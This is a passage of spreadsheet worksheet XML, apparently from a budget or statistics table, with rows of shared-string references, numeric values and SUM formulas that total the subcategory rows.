      <c r="C477" s="17">
        <v>0</v>
      </c>
      <c r="D477" s="13" t="s">
        <v>5190</v>
      </c>
      <c r="E477" s="16" t="s">
        <v>3298</v>
      </c>
      <c r="F477" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="478" spans="1:6">
      <c r="A478" s="10"/>
      <c r="B478" s="16" t="s">
        <v>3299</v>
      </c>
      <c r="C478" s="17">
        <v>0</v>
      </c>
      <c r="D478" s="13" t="s">
        <v>5191</v>
      </c>
      <c r="E478" s="16" t="s">
        <v>3300</v>
      </c>
      <c r="F478" s="17">
        <v>26</v>
      </c>
    </row>
    <row r="479" spans="1:6">
      <c r="A479" s="10"/>
      <c r="B479" s="16" t="s">
        <v>3301</v>
      </c>
      <c r="C479" s="17">
        <v>0</v>
      </c>
      <c r="D479" s="13" t="s">
        <v>5192</v>
      </c>
      <c r="E479" s="11" t="s">
        <v>3302</v>
      </c>
      <c r="F479" s="12">
        <f>SUM(F480:F482)</f>
        <v>438</v>
      </c>
    </row>
    <row r="480" spans="1:6">
      <c r="A480" s="10"/>
      <c r="B480" s="16" t="s">
        <v>3303</v>
      </c>
      <c r="C480" s="17">
        <v>0</v>
      </c>
      <c r="D480" s="13" t="s">
        <v>5193</v>
      </c>
      <c r="E480" s="16" t="s">
        <v>3304</v>
      </c>
      <c r="F480" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="481" spans="1:6">
      <c r="A481" s="10"/>
      <c r="B481" s="16" t="s">
        <v>3305</v>
      </c>
      <c r="C481" s="17">
        <v>0</v>
      </c>
      <c r="D481" s="13" t="s">
        <v>5194</v>
      </c>
      <c r="E481" s="16" t="s">
        <v>3306</v>
      </c>
      <c r="F481" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="482" spans="1:6">
      <c r="A482" s="10"/>
      <c r="B482" s="16" t="s">
        <v>3307</v>
      </c>
      <c r="C482" s="17">
        <v>0</v>
      </c>
      <c r="D482" s="13" t="s">
        <v>5195</v>
      </c>
      <c r="E482" s="16" t="s">
        <v>3308</v>
      </c>
      <c r="F482" s="17">
        <v>438</v>
      </c>
    </row>
    <row r="483" spans="1:6">
      <c r="A483" s="10"/>
      <c r="B483" s="16" t="s">
        <v>3309</v>
      </c>
      <c r="C483" s="17">
        <v>0</v>
      </c>
      <c r="D483" s="13" t="s">
        <v>5196</v>
      </c>
      <c r="E483" s="11" t="s">
        <v>3310</v>
      </c>
      <c r="F483" s="12">
        <f>F484+F485+F486</f>
        <v>106</v>
      </c>
    </row>
    <row r="484" spans="1:6">
      <c r="A484" s="10"/>
      <c r="B484" s="16" t="s">
        <v>3311</v>
      </c>
      <c r="C484" s="17">
        <v>0</v>
      </c>
      <c r="D484" s="13" t="s">
        <v>5197</v>
      </c>
      <c r="E484" s="16" t="s">
        <v>3312</v>
      </c>
      <c r="F484" s="17">
        <v>106</v>
      </c>
    </row>
    <row r="485" spans="1:6">
      <c r="A485" s="10"/>
      <c r="B485" s="16" t="s">
        <v>3313</v>
      </c>
      <c r="C485" s="17">
        <v>0</v>
      </c>
      <c r="D485" s="13" t="s">
        <v>5198</v>
      </c>
      <c r="E485" s="16" t="s">
        <v>3314</v>
      </c>
      <c r="F485" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="486" spans="1:6">
      <c r="A486" s="10"/>
      <c r="B486" s="16" t="s">
        <v>3315</v>
      </c>
      <c r="C486" s="17">
        <v>0</v>
      </c>
      <c r="D486" s="13" t="s">
        <v>5199</v>
      </c>
      <c r="E486" s="16" t="s">
        <v>3316</v>
      </c>
      <c r="F486" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="487" spans="1:6">
      <c r="A487" s="10"/>
      <c r="B487" s="16" t="s">
        <v>3317</v>
      </c>
      <c r="C487" s="17">
        <v>0</v>
      </c>
      <c r="D487" s="13" t="s">
        <v>5200</v>
      </c>
      <c r="E487" s="11" t="s">
        <v>3318</v>
      </c>
      <c r="F487" s="12">
        <f>SUM(F488:F491)</f>
        <v>1080</v>
      </c>
    </row>
    <row r="488" spans="1:6">
      <c r="A488" s="10"/>
      <c r="B488" s="16" t="s">
        <v>3319</v>
      </c>
      <c r="C488" s="17">
        <v>0</v>
      </c>
      <c r="D488" s="13" t="s">
        <v>5201</v>
      </c>
      <c r="E488" s="16" t="s">
        <v>3320</v>
      </c>
      <c r="F488" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="489" spans="1:6">
      <c r="A489" s="10"/>
      <c r="B489" s="16" t="s">
        <v>3321</v>
      </c>
      <c r="C489" s="17">
        <v>0</v>
      </c>
      <c r="D489" s="13" t="s">
        <v>5202</v>
      </c>
      <c r="E489" s="16" t="s">
        <v>3322</v>
      </c>
      <c r="F489" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="490" spans="1:6">
      <c r="A490" s="10"/>
      <c r="B490" s="16" t="s">
        <v>3323</v>
      </c>
      <c r="C490" s="17">
        <v>0</v>
      </c>
      <c r="D490" s="13" t="s">
        <v>5203</v>
      </c>
      <c r="E490" s="16" t="s">
        <v>3324</v>
      </c>
      <c r="F490" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="491" spans="1:6">
      <c r="A491" s="10"/>
      <c r="B491" s="16" t="s">
        <v>3325</v>
      </c>
      <c r="C491" s="17">
        <v>0</v>
      </c>
      <c r="D491" s="13" t="s">
        <v>5204</v>
      </c>
      <c r="E491" s="16" t="s">
        <v>3326</v>
      </c>
      <c r="F491" s="17">
        <v>1080</v>
      </c>
    </row>
    <row r="492" spans="1:6">
      <c r="A492" s="10"/>
      <c r="B492" s="16" t="s">
        <v>3327</v>
      </c>
      <c r="C492" s="17">
        <v>0</v>
      </c>
      <c r="D492" s="13" t="s">
        <v>5205</v>
      </c>
      <c r="E492" s="11" t="s">
        <v>3328</v>
      </c>
      <c r="F492" s="12">
        <f>SUM(F493,F509,F517,F528,F537,F545)</f>
        <v>5611</v>
      </c>
    </row>
    <row r="493" spans="1:6">
      <c r="A493" s="10"/>
      <c r="B493" s="16" t="s">
        <v>3329</v>
      </c>
      <c r="C493" s="17">
        <v>0</v>
      </c>
      <c r="D493" s="13" t="s">
        <v>5206</v>
      </c>
      <c r="E493" s="11" t="s">
        <v>3330</v>
      </c>
      <c r="F493" s="12">
        <f>SUM(F494:F508)</f>
        <v>3261</v>
      </c>
    </row>
    <row r="494" spans="1:6">
      <c r="A494" s="10"/>
      <c r="B494" s="16" t="s">
        <v>3331</v>
      </c>
      <c r="C494" s="17">
        <v>0</v>
      </c>
      <c r="D494" s="13" t="s">
        <v>5207</v>
      </c>
      <c r="E494" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F494" s="17">
        <v>2427</v>
      </c>
    </row>
    <row r="495" spans="1:6">
      <c r="A495" s="10"/>
      <c r="B495" s="16" t="s">
        <v>3332</v>
      </c>
      <c r="C495" s="17">
        <v>0</v>
      </c>
      <c r="D495" s="13" t="s">
        <v>5208</v>
      </c>
      <c r="E495" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F495" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="496" spans="1:6">
      <c r="A496" s="10"/>
      <c r="B496" s="16" t="s">
        <v>3333</v>
      </c>
      <c r="C496" s="17">
        <v>0</v>
      </c>
      <c r="D496" s="13" t="s">
        <v>5209</v>
      </c>
      <c r="E496" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F496" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="497" spans="1:6">
      <c r="A497" s="10"/>
      <c r="B497" s="16" t="s">
        <v>3334</v>
      </c>
      <c r="C497" s="17">
        <v>0</v>
      </c>
      <c r="D497" s="13" t="s">
        <v>5210</v>
      </c>
      <c r="E497" s="16" t="s">
        <v>3335</v>
      </c>
      <c r="F497" s="17">
        <v>3</v>
      </c>
    </row>
    <row r="498" spans="1:6">
      <c r="A498" s="10"/>
      <c r="B498" s="16" t="s">
        <v>3336</v>
      </c>
      <c r="C498" s="17">
        <v>0</v>
      </c>
      <c r="D498" s="13" t="s">
        <v>5211</v>
      </c>
      <c r="E498" s="16" t="s">
        <v>3337</v>
      </c>
      <c r="F498" s="17">
        <v>3</v>
      </c>
    </row>
    <row r="499" spans="1:6">
      <c r="A499" s="26"/>
      <c r="B499" s="26"/>
      <c r="C499" s="30"/>
      <c r="D499" s="10" t="s">
        <v>5212</v>
      </c>
      <c r="E499" s="16" t="s">
        <v>3338</v>
      </c>
      <c r="F499" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="500" spans="1:6">
      <c r="A500" s="10"/>
      <c r="B500" s="10"/>
      <c r="C500" s="28"/>
      <c r="D500" s="10" t="s">
        <v>5213</v>
      </c>
      <c r="E500" s="16" t="s">
        <v>3339</v>
      </c>
      <c r="F500" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="501" spans="1:6">
      <c r="A501" s="10"/>
      <c r="B501" s="10"/>
      <c r="C501" s="28"/>
      <c r="D501" s="10" t="s">
        <v>5214</v>
      </c>
      <c r="E501" s="16" t="s">
        <v>3340</v>
      </c>
      <c r="F501" s="17">
        <v>10</v>
      </c>
    </row>
    <row r="502" spans="1:6">
      <c r="A502" s="10"/>
      <c r="B502" s="10"/>
      <c r="C502" s="28"/>
      <c r="D502" s="10" t="s">
        <v>5215</v>
      </c>
      <c r="E502" s="16" t="s">
        <v>3341</v>
      </c>
      <c r="F502" s="17">
        <v>3</v>
      </c>
    </row>
    <row r="503" spans="1:6">
      <c r="A503" s="10"/>
      <c r="B503" s="10"/>
      <c r="C503" s="28"/>
      <c r="D503" s="10" t="s">
        <v>5216</v>
      </c>
      <c r="E503" s="16" t="s">
        <v>3342</v>
      </c>
      <c r="F503" s="17">
        <v>100</v>
      </c>
    </row>
    <row r="504" spans="1:6">
      <c r="A504" s="10"/>
      <c r="B504" s="10"/>
      <c r="C504" s="28"/>
      <c r="D504" s="10" t="s">
        <v>5217</v>
      </c>
      <c r="E504" s="16" t="s">
        <v>3343</v>
      </c>
      <c r="F504" s="17">
        <v>13</v>
      </c>
    </row>
    <row r="505" spans="1:6">
      <c r="A505" s="10"/>
      <c r="B505" s="10"/>
      <c r="C505" s="28"/>
      <c r="D505" s="10" t="s">
        <v>5218</v>
      </c>
      <c r="E505" s="16" t="s">
        <v>3344</v>
      </c>
      <c r="F505" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="506" spans="1:6">
      <c r="A506" s="10"/>
      <c r="B506" s="10"/>
      <c r="C506" s="28"/>
      <c r="D506" s="10" t="s">
        <v>5219</v>
      </c>
      <c r="E506" s="16" t="s">
        <v>3345</v>
      </c>
      <c r="F506" s="17">
        <v>6</v>
      </c>
    </row>
    <row r="507" spans="1:6">
      <c r="A507" s="10"/>
      <c r="B507" s="10"/>
      <c r="C507" s="28"/>
      <c r="D507" s="10" t="s">
        <v>5220</v>
      </c>
      <c r="E507" s="16" t="s">
        <v>3346</v>
      </c>
      <c r="F507" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="508" spans="1:6">
      <c r="A508" s="10"/>
      <c r="B508" s="10"/>
      <c r="C508" s="28"/>
      <c r="D508" s="10" t="s">
        <v>5221</v>
      </c>
      <c r="E508" s="16" t="s">
        <v>3347</v>
      </c>
      <c r="F508" s="17">
        <v>696</v>
      </c>
    </row>
    <row r="509" spans="1:6">
      <c r="A509" s="10"/>
      <c r="B509" s="10"/>
      <c r="C509" s="28"/>
      <c r="D509" s="10" t="s">
        <v>5222</v>
      </c>
      <c r="E509" s="11" t="s">
        <v>3348</v>
      </c>
      <c r="F509" s="12">
        <f>SUM(F510:F516)</f>
        <v>124</v>
      </c>
    </row>
    <row r="510" spans="1:6">
      <c r="A510" s="10"/>
      <c r="B510" s="10"/>
      <c r="C510" s="28"/>
      <c r="D510" s="10" t="s">
        <v>5223</v>
      </c>
      <c r="E510" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F510" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="511" spans="1:6">
      <c r="A511" s="10"/>
      <c r="B511" s="10"/>
      <c r="C511" s="28"/>
      <c r="D511" s="10" t="s">
        <v>5224</v>
      </c>
      <c r="E511" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F511" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="512" spans="1:6">
      <c r="A512" s="10"/>
      <c r="B512" s="10"/>
      <c r="C512" s="28"/>
      <c r="D512" s="10" t="s">
        <v>5225</v>
      </c>
      <c r="E512" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F512" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="513" spans="1:6">
      <c r="A513" s="10"/>
      <c r="B513" s="10"/>
      <c r="C513" s="28"/>
      <c r="D513" s="10" t="s">
        <v>5226</v>
      </c>
      <c r="E513" s="16" t="s">
        <v>3349</v>
      </c>
      <c r="F513" s="17">
        <v>13</v>
      </c>
    </row>
    <row r="514" spans="1:6">
      <c r="A514" s="10"/>
      <c r="B514" s="10"/>
      <c r="C514" s="28"/>
      <c r="D514" s="10" t="s">
        <v>5227</v>
      </c>
      <c r="E514" s="16" t="s">
        <v>3350</v>
      </c>
      <c r="F514" s="17">
        <v>34</v>
      </c>
    </row>
    <row r="515" spans="1:6">
      <c r="A515" s="10"/>
      <c r="B515" s="10"/>
      <c r="C515" s="28"/>
      <c r="D515" s="10" t="s">
        <v>5228</v>
      </c>
      <c r="E515" s="16" t="s">
        <v>3351</v>
      </c>
      <c r="F515" s="17">
        <v>77</v>
      </c>
    </row>
    <row r="516" spans="1:6">
      <c r="A516" s="10"/>
      <c r="B516" s="10"/>
      <c r="C516" s="28"/>
      <c r="D516" s="10" t="s">
        <v>5229</v>
      </c>
      <c r="E516" s="16" t="s">
        <v>3352</v>
      </c>
      <c r="F516" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="517" spans="1:6">
      <c r="A517" s="10"/>
      <c r="B517" s="10"/>
      <c r="C517" s="28"/>
      <c r="D517" s="10" t="s">
        <v>5230</v>
      </c>
      <c r="E517" s="11" t="s">
        <v>3353</v>
      </c>
      <c r="F517" s="12">
        <f>SUM(F518:F527)</f>
        <v>0</v>
      </c>
    </row>
    <row r="518" spans="1:6">
      <c r="A518" s="10"/>
      <c r="B518" s="10"/>
      <c r="C518" s="28"/>
      <c r="D518" s="10" t="s">
        <v>5231</v>
      </c>
      <c r="E518" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F518" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="519" spans="1:6">
      <c r="A519" s="10"/>
      <c r="B519" s="10"/>
      <c r="C519" s="28"/>
      <c r="D519" s="10" t="s">
        <v>5232</v>
      </c>
      <c r="E519" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F519" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="520" spans="1:6">
      <c r="A520" s="10"/>
      <c r="B520" s="10"/>
      <c r="C520" s="28"/>
      <c r="D520" s="10" t="s">
        <v>5233</v>
      </c>
      <c r="E520" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F520" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="521" spans="1:6">
      <c r="A521" s="10"/>
      <c r="B521" s="10"/>
      <c r="C521" s="28"/>
      <c r="D521" s="10" t="s">
        <v>5234</v>
      </c>
      <c r="E521" s="16" t="s">
        <v>3354</v>
      </c>
      <c r="F521" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="522" spans="1:6">
      <c r="A522" s="10"/>
      <c r="B522" s="10"/>
      <c r="C522" s="28"/>
      <c r="D522" s="10" t="s">
        <v>5235</v>
      </c>
      <c r="E522" s="16" t="s">
        <v>3355</v>
      </c>
      <c r="F522" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="523" spans="1:6">
      <c r="A523" s="10"/>
      <c r="B523" s="10"/>
      <c r="C523" s="28"/>
      <c r="D523" s="10" t="s">
        <v>5236</v>
      </c>
      <c r="E523" s="16" t="s">
        <v>3356</v>
      </c>
      <c r="F523" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="524" spans="1:6">
      <c r="A524" s="10"/>
      <c r="B524" s="10"/>
      <c r="C524" s="28"/>
      <c r="D524" s="10" t="s">
        <v>5237</v>
      </c>
      <c r="E524" s="16" t="s">
        <v>3357</v>
      </c>
      <c r="F524" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="525" spans="1:6">
      <c r="A525" s="10"/>
      <c r="B525" s="10"/>
      <c r="C525" s="28"/>
      <c r="D525" s="10" t="s">
        <v>5238</v>
      </c>
      <c r="E525" s="16" t="s">
        <v>3358</v>
      </c>
      <c r="F525" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="526" spans="1:6">
      <c r="A526" s="10"/>
      <c r="B526" s="10"/>
      <c r="C526" s="28"/>
      <c r="D526" s="10" t="s">
        <v>5239</v>
      </c>
      <c r="E526" s="16" t="s">
        <v>3359</v>
      </c>
      <c r="F526" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="527" spans="1:6">
      <c r="A527" s="10"/>
      <c r="B527" s="10"/>
      <c r="C527" s="28"/>
      <c r="D527" s="10" t="s">
        <v>5240</v>
      </c>
      <c r="E527" s="16" t="s">
        <v>3360</v>
      </c>
      <c r="F527" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="528" spans="1:6">
      <c r="A528" s="10"/>
      <c r="B528" s="10"/>
      <c r="C528" s="28"/>
      <c r="D528" s="10" t="s">
        <v>5241</v>
      </c>
      <c r="E528" s="11" t="s">
        <v>3361</v>
      </c>
      <c r="F528" s="12">
        <f>SUM(F529:F536)</f>
        <v>0</v>
      </c>
    </row>
    <row r="529" spans="1:6">
      <c r="A529" s="10"/>
      <c r="B529" s="10"/>
      <c r="C529" s="28"/>
      <c r="D529" s="10" t="s">
        <v>5242</v>
      </c>
      <c r="E529" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F529" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="530" spans="1:6">
      <c r="A530" s="10"/>
      <c r="B530" s="10"/>
      <c r="C530" s="28"/>
      <c r="D530" s="10" t="s">
        <v>5243</v>
      </c>
      <c r="E530" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F530" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="531" spans="1:6">
      <c r="A531" s="10"/>
      <c r="B531" s="10"/>
      <c r="C531" s="28"/>
      <c r="D531" s="10" t="s">
        <v>5244</v>
      </c>
      <c r="E531" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F531" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="532" spans="1:6">
      <c r="A532" s="10"/>
      <c r="B532" s="10"/>
      <c r="C532" s="28"/>
      <c r="D532" s="10" t="s">
        <v>5245</v>
      </c>
      <c r="E532" s="16" t="s">
        <v>3362</v>
      </c>
      <c r="F532" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="533" spans="1:6">
      <c r="A533" s="10"/>
      <c r="B533" s="10"/>
      <c r="C533" s="28"/>
      <c r="D533" s="10" t="s">
        <v>5246</v>
      </c>
      <c r="E533" s="16" t="s">
        <v>3363</v>
      </c>
      <c r="F533" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="534" spans="1:6">
      <c r="A534" s="10"/>
      <c r="B534" s="10"/>
      <c r="C534" s="28"/>
      <c r="D534" s="10" t="s">
        <v>5247</v>
      </c>
      <c r="E534" s="16" t="s">
        <v>3364</v>
      </c>
      <c r="F534" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="535" spans="1:6">
      <c r="A535" s="10"/>
      <c r="B535" s="10"/>
      <c r="C535" s="28"/>
      <c r="D535" s="10" t="s">
        <v>5248</v>
      </c>
      <c r="E535" s="16" t="s">
        <v>3365</v>
      </c>
      <c r="F535" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="536" spans="1:6">
      <c r="A536" s="10"/>
      <c r="B536" s="10"/>
      <c r="C536" s="28"/>
      <c r="D536" s="10" t="s">
        <v>5249</v>
      </c>
      <c r="E536" s="16" t="s">
        <v>3366</v>
      </c>
      <c r="F536" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="537" spans="1:6">
      <c r="A537" s="10"/>
      <c r="B537" s="10"/>
      <c r="C537" s="28"/>
      <c r="D537" s="10" t="s">
        <v>5250</v>
      </c>
      <c r="E537" s="11" t="s">
        <v>3367</v>
      </c>
      <c r="F537" s="12">
        <f>SUM(F538:F544)</f>
        <v>1797</v>
      </c>
    </row>
    <row r="538" spans="1:6">
      <c r="A538" s="10"/>
      <c r="B538" s="10"/>
      <c r="C538" s="28"/>
      <c r="D538" s="10" t="s">
        <v>5251</v>
      </c>
      <c r="E538" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F538" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="539" spans="1:6">
      <c r="A539" s="10"/>
      <c r="B539" s="10"/>
      <c r="C539" s="28"/>
      <c r="D539" s="10" t="s">
        <v>5252</v>
      </c>
      <c r="E539" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F539" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="540" spans="1:6">
      <c r="A540" s="10"/>
      <c r="B540" s="10"/>
      <c r="C540" s="28"/>
      <c r="D540" s="10" t="s">
        <v>5253</v>
      </c>
      <c r="E540" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F540" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="541" spans="1:6">
      <c r="A541" s="10"/>
      <c r="B541" s="10"/>
      <c r="C541" s="28"/>
      <c r="D541" s="10" t="s">
        <v>5254</v>
      </c>
      <c r="E541" s="16" t="s">
        <v>3368</v>
      </c>
      <c r="F541" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="542" spans="1:6">
      <c r="A542" s="10"/>
      <c r="B542" s="10"/>
      <c r="C542" s="28"/>
      <c r="D542" s="10" t="s">
        <v>5255</v>
      </c>
      <c r="E542" s="16" t="s">
        <v>3369</v>
      </c>
      <c r="F542" s="17">
        <v>100</v>
      </c>
    </row>
    <row r="543" spans="1:6">
      <c r="A543" s="10"/>
      <c r="B543" s="10"/>
      <c r="C543" s="28"/>
      <c r="D543" s="10" t="s">
        <v>5256</v>
      </c>
      <c r="E543" s="16" t="s">
        <v>3370</v>
      </c>
      <c r="F543" s="17">
        <v>1448</v>
      </c>
    </row>
    <row r="544" spans="1:6">
      <c r="A544" s="10"/>
      <c r="B544" s="10"/>
      <c r="C544" s="28"/>
      <c r="D544" s="10" t="s">
        <v>5257</v>
      </c>
      <c r="E544" s="16" t="s">
        <v>3371</v>
      </c>
      <c r="F544" s="17">
        <v>249</v>
      </c>
    </row>
    <row r="545" spans="1:6">
      <c r="A545" s="10"/>
      <c r="B545" s="10"/>
      <c r="C545" s="28"/>
      <c r="D545" s="10" t="s">
        <v>5258</v>
      </c>
      <c r="E545" s="11" t="s">
        <v>3372</v>
      </c>
      <c r="F545" s="12">
        <f>SUM(F546:F548)</f>
        <v>429</v>
      </c>
    </row>
    <row r="546" spans="1:6">
      <c r="A546" s="10"/>
      <c r="B546" s="10"/>
      <c r="C546" s="28"/>
      <c r="D546" s="10" t="s">
        <v>5259</v>
      </c>
      <c r="E546" s="16" t="s">
        <v>3373</v>
      </c>
      <c r="F546" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="547" spans="1:6">
      <c r="A547" s="10"/>
      <c r="B547" s="10"/>
      <c r="C547" s="28"/>
      <c r="D547" s="10" t="s">
        <v>5260</v>
      </c>
      <c r="E547" s="16" t="s">
        <v>3374</v>
      </c>
      <c r="F547" s="17">
        <v>6</v>
      </c>
    </row>
    <row r="548" spans="1:6">
      <c r="A548" s="10"/>
      <c r="B548" s="10"/>
      <c r="C548" s="28"/>
      <c r="D548" s="10" t="s">
        <v>5261</v>
      </c>
      <c r="E548" s="16" t="s">
        <v>3375</v>
      </c>
      <c r="F548" s="17">
        <v>423</v>
      </c>
    </row>
    <row r="549" spans="1:6">
      <c r="A549" s="10"/>
      <c r="B549" s="10"/>
      <c r="C549" s="28"/>
      <c r="D549" s="10" t="s">
        <v>5262</v>
      </c>
      <c r="E549" s="11" t="s">
        <v>3376</v>
      </c>
      <c r="F549" s="12">
        <f>F550+F569+F577+F579+F588+F592+F602+F610+F617+F625+F634+F639+F642+F645+F648+F651+F654+F658+F662+F670+F673</f>
        <v>97259</v>
      </c>
    </row>
    <row r="550" spans="1:6">
      <c r="A550" s="10"/>
      <c r="B550" s="10"/>
      <c r="C550" s="28"/>
      <c r="D550" s="10" t="s">
        <v>5263</v>
      </c>
      <c r="E550" s="11" t="s">
        <v>3377</v>
      </c>
      <c r="F550" s="12">
        <f>SUM(F551:F568)</f>
        <v>2697</v>
      </c>
    </row>
    <row r="551" spans="1:6">
      <c r="A551" s="10"/>
      <c r="B551" s="10"/>
      <c r="C551" s="28"/>
      <c r="D551" s="10" t="s">
        <v>5264</v>
      </c>
      <c r="E551" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F551" s="17">
        <v>2355</v>
      </c>
    </row>
    <row r="552" spans="1:6">
      <c r="A552" s="10"/>
      <c r="B552" s="10"/>
      <c r="C552" s="28"/>
      <c r="D552" s="10" t="s">
        <v>5265</v>
      </c>
      <c r="E552" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F552" s="17">
        <v>31</v>
      </c>
    </row>
    <row r="553" spans="1:6">
      <c r="A553" s="10"/>
      <c r="B553" s="10"/>
      <c r="C553" s="28"/>
      <c r="D553" s="10" t="s">
        <v>5266</v>
      </c>
      <c r="E553" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F553" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="554" spans="1:6">
      <c r="A554" s="10"/>
      <c r="B554" s="10"/>
      <c r="C554" s="28"/>
      <c r="D554" s="10" t="s">
        <v>5267</v>
      </c>
      <c r="E554" s="16" t="s">
        <v>3378</v>
      </c>
      <c r="F554" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="555" spans="1:6">
      <c r="A555" s="10"/>
      <c r="B555" s="10"/>
      <c r="C555" s="28"/>
      <c r="D555" s="10" t="s">
        <v>5268</v>
      </c>
      <c r="E555" s="16" t="s">
        <v>3379</v>
      </c>
      <c r="F555" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="556" spans="1:6">
      <c r="A556" s="10"/>
      <c r="B556" s="10"/>
      <c r="C556" s="28"/>
      <c r="D556" s="10" t="s">
        <v>5269</v>
      </c>
      <c r="E556" s="16" t="s">
        <v>3380</v>
      </c>
      <c r="F556" s="17">
        <v>40</v>
      </c>
    </row>
    <row r="557" spans="1:6">
      <c r="A557" s="10"/>
      <c r="B557" s="10"/>
      <c r="C557" s="28"/>
      <c r="D557" s="10" t="s">
        <v>5270</v>
      </c>
      <c r="E557" s="16" t="s">
        <v>3381</v>
      </c>
      <c r="F557" s="17">
        <v>50</v>
      </c>
    </row>
    <row r="558" spans="1:6">
      <c r="A558" s="10"/>
      <c r="B558" s="10"/>
      <c r="C558" s="28"/>
      <c r="D558" s="10" t="s">
        <v>5271</v>
      </c>
      <c r="E558" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F558" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="559" spans="1:6">
      <c r="A559" s="10"/>
      <c r="B559" s="10"/>
      <c r="C559" s="28"/>
      <c r="D559" s="10" t="s">
        <v>5272</v>
      </c>
      <c r="E559" s="16" t="s">
        <v>3382</v>
      </c>
      <c r="F559" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="560" spans="1:6">
      <c r="A560" s="10"/>
      <c r="B560" s="10"/>
      <c r="C560" s="28"/>
      <c r="D560" s="10" t="s">
        <v>5273</v>
      </c>
      <c r="E560" s="16" t="s">
        <v>3383</v>
      </c>
      <c r="F560" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="561" spans="1:6">
      <c r="A561" s="10"/>
      <c r="B561" s="10"/>
      <c r="C561" s="28"/>
      <c r="D561" s="10" t="s">
        <v>5274</v>
      </c>
      <c r="E561" s="16" t="s">
        <v>3384</v>
      </c>
      <c r="F561" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="562" spans="1:6">
      <c r="A562" s="10"/>
      <c r="B562" s="10"/>
      <c r="C562" s="28"/>
      <c r="D562" s="10" t="s">
        <v>5275</v>
      </c>
      <c r="E562" s="16" t="s">
        <v>3385</v>
      </c>
      <c r="F562" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="563" spans="1:6">
      <c r="A563" s="10"/>
      <c r="B563" s="10"/>
      <c r="C563" s="28"/>
      <c r="D563" s="10" t="s">
        <v>5276</v>
      </c>
      <c r="E563" s="16" t="s">
        <v>3386</v>
      </c>
      <c r="F563" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="564" spans="1:6">
      <c r="A564" s="10"/>
      <c r="B564" s="10"/>
      <c r="C564" s="31"/>
      <c r="D564" s="10" t="s">
        <v>5277</v>
      </c>
      <c r="E564" s="16" t="s">
        <v>3387</v>
      </c>
      <c r="F564" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="565" spans="1:6">
      <c r="A565" s="10"/>
      <c r="B565" s="10"/>
      <c r="C565" s="31"/>
      <c r="D565" s="10" t="s">
        <v>5278</v>
      </c>
      <c r="E565" s="16" t="s">
        <v>3388</v>
      </c>
      <c r="F565" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="566" spans="1:6">
      <c r="A566" s="10"/>
      <c r="B566" s="10"/>
      <c r="C566" s="28"/>
      <c r="D566" s="10" t="s">
        <v>5279</v>
      </c>
      <c r="E566" s="16" t="s">
        <v>3389</v>
      </c>
      <c r="F566" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="567" spans="1:6">
      <c r="A567" s="10"/>
      <c r="B567" s="10"/>
      <c r="C567" s="28"/>
      <c r="D567" s="10" t="s">
        <v>5280</v>
      </c>
